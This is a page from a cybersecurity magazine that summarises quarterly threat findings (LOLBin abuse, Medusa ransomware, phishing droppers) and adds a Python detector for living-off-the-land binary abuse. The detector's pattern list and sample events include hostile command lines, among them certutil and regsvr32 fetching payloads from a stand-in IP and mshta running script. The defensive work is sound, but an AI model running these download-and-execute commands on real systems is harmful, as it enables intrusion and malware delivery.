Page 120 - Cyber Defense eMagazine June 2024
Among the key findings, the Internet Security Report featuring data from Q3 2023 showed:
• Threat actors increasingly use legitimate remote management tools and software to evade anti-malware detection. This trend has also been noted by both the FBI and CISA. For instance, while researching the top phishing domains, the Threat Lab observed a tech support scam that led the victim to download a pre-configured, unauthorized version of TeamViewer, which gave the attacker full remote access to the victim's computer.
• The Medusa ransomware variant surged in Q3, driving endpoint ransomware attacks up 89%. On the surface, endpoint ransomware detections appeared to be down in Q3. Yet the Medusa ransomware variant, which appeared in the Top 10 malware threats for the first time, was detected with a generic signature from the Threat Lab's automated signature engine rather than a ransomware-specific one, so it was not initially counted as ransomware. When the Medusa detections are included, ransomware attacks rose 89% quarter over quarter.
• Threat actors pivot away from script-based attacks and increasingly employ other living-off-the-land techniques. Malicious scripts declined as an attack vector by 11% in Q3, after dropping by 41% in Q2. Still, script-based attacks remain the largest attack vector, accounting for 56% of total attacks, and scripting languages such as PowerShell are often used in living-off-the-land attacks. At the same time, abuse of Windows living-off-the-land binaries (LOLBins) increased 32%. These findings indicate to Threat Lab researchers that threat actors continue to use multiple living-off-the-land techniques, likely in response to stronger protections around PowerShell and other scripting engines (logging, constrained language mode and AMSI scanning). Living-off-the-land techniques account for the majority of endpoint attacks.
• Malware arriving over encrypted connections declined to 48%, meaning just under half of all
malware detected came via encrypted traffic. This figure is notable because it is down
considerably from previous quarters. Overall, total malware detections increased by 14%.
• An email-based dropper family that delivers malicious payloads accounted for four of the Top 5 encrypted malware detections in Q3. All but one of the variants in the Top 5 belonged to the dropper family named Stacked, which arrives as an attachment to a spear-phishing email. Threat actors send emails with malicious attachments that appear to come from a known sender and claim to include an invoice or an important document for review, aiming to trick end users into opening the attachment and installing the malware. Two of the Stacked variants, Stacked.1.12 and Stacked.1.7, also appeared in the Top 10 malware detections.
• Commoditized malware emerges. Among the top malware threats, a new malware family,
Lazy.360502, made the Top 10 list. It delivers the adware variant 2345explorer as well as the
Vidar password stealer. This malware threat connected to a Chinese website that provided a
credential stealer and appeared to operate like a “password stealer as a service,” where threat
actors could pay for stolen credentials, illustrating how commoditized malware is being used.
• Network attacks increased 16% in Q3. ProxyLogon, the 2021 Microsoft Exchange Server vulnerability chain (CVE-2021-26855), was the number-one vulnerability targeted in network attacks, comprising 10% of all network detections.
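The living-off-the-land finding above is the one a defender can act on directly: because LOLBins such as certutil.exe, mshta.exe and regsvr32.exe are signed Microsoft binaries, they cannot be blocked outright, so detection has to key on how they are invoked and by what. The following is an added example written for this page, not code from WatchGuard or the Threat Lab. It scores process-creation events whose field names mirror Sysmon Event ID 1 (Image, CommandLine, ParentImage, ProcessId) against command-line indicators of download, decode and script-host abuse, and raises the score when an Office application is the parent. The events, IP address and file names are constructed for the example.

```python
"""Flag living-off-the-land binary (LOLBin) abuse in process-creation events.

Added example. The event records below are constructed, not real telemetry;
field names follow Sysmon Event ID 1 (Image, CommandLine, ParentImage, ProcessId).
"""
import re
from typing import Dict, List

# Signed Windows binaries commonly abused to fetch, decode or execute a payload
# without dropping a script, each paired with command-line patterns that
# indicate that abuse rather than ordinary administrative use.
LOLBIN_INDICATORS: Dict[str, List[re.Pattern]] = {
    "certutil.exe": [re.compile(r"-urlcache", re.I), re.compile(r"-decode(hex)?\b", re.I)],
    "mshta.exe": [re.compile(r"https?://", re.I), re.compile(r"(javascript|vbscript):", re.I)],
    "regsvr32.exe": [re.compile(r"/i:https?://", re.I), re.compile(r"scrobj\.dll", re.I)],
    "rundll32.exe": [re.compile(r"javascript:", re.I), re.compile(r"https?://", re.I)],
    "bitsadmin.exe": [re.compile(r"/transfer", re.I)],
    "wmic.exe": [re.compile(r"process\s+call\s+create", re.I)],
    "msiexec.exe": [re.compile(r"/[iq].*https?://", re.I)],
    "cmstp.exe": [re.compile(r"/ni\b", re.I), re.compile(r"/s\b", re.I)],
}

# Office applications essentially never have a legitimate reason to spawn the
# binaries above; a maldoc dropping into a LOLBin is a classic phishing chain.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path (handles either slash style)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> dict:
    """Return the event's image, parent and a list of reasons it looks like LOLBin abuse."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons: List[str] = []
    if image in LOLBIN_INDICATORS:
        for pat in LOLBIN_INDICATORS[image]:
            if pat.search(cmd):
                reasons.append(f"{image} command line matches {pat.pattern!r}")
        if parent in OFFICE_PARENTS:
            reasons.append(f"{image} spawned by Office process {parent}")
    return {"pid": event.get("ProcessId"), "image": image, "parent": parent,
            "score": len(reasons), "reasons": reasons}


def scan(events: List[dict]) -> List[dict]:
    """Score every event and keep only those with at least one indicator."""
    return [r for r in (score_event(e) for e in events) if r["score"] > 0]


# Constructed sample events: three abuse patterns and two benign invocations.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.10/inv.png C:\Users\Public\inv.exe"},
    {"ProcessId": 4188, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s /n /u /i:http://203.0.113.10/a.sct scrobj.dll"},
    {"ProcessId": 4200, "ParentImage": r"C:\Windows\explorer.exe",          # benign control-panel launch
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
    {"ProcessId": 4211, "ParentImage": r"C:\Windows\System32\cmd.exe",      # benign hash check
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -hashfile C:\Tools\setup.msi SHA256"},
    {"ProcessId": 4250, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe javascript:a=new ActiveXObject("WScript.Shell");a.Run("calc.exe");close()'},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"pid {finding['pid']} score {finding['score']}:")
        for reason in finding["reasons"]:
            print("   ", reason)
```

Running the block reports the certutil download from WINWORD.EXE, the regsvr32 scriptlet fetch and the mshta JavaScript launch from EXCEL.EXE, and stays silent on the control-panel rundll32 and the certutil hash check. In production the indicator table would be tuned against the environment's own baseline, since an enterprise that uses BITS or msiexec for software distribution will need an allow-list on the parent process or the URL host.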
Copyright © 2024, Cyber Defense Magazine. All rights reserved worldwide.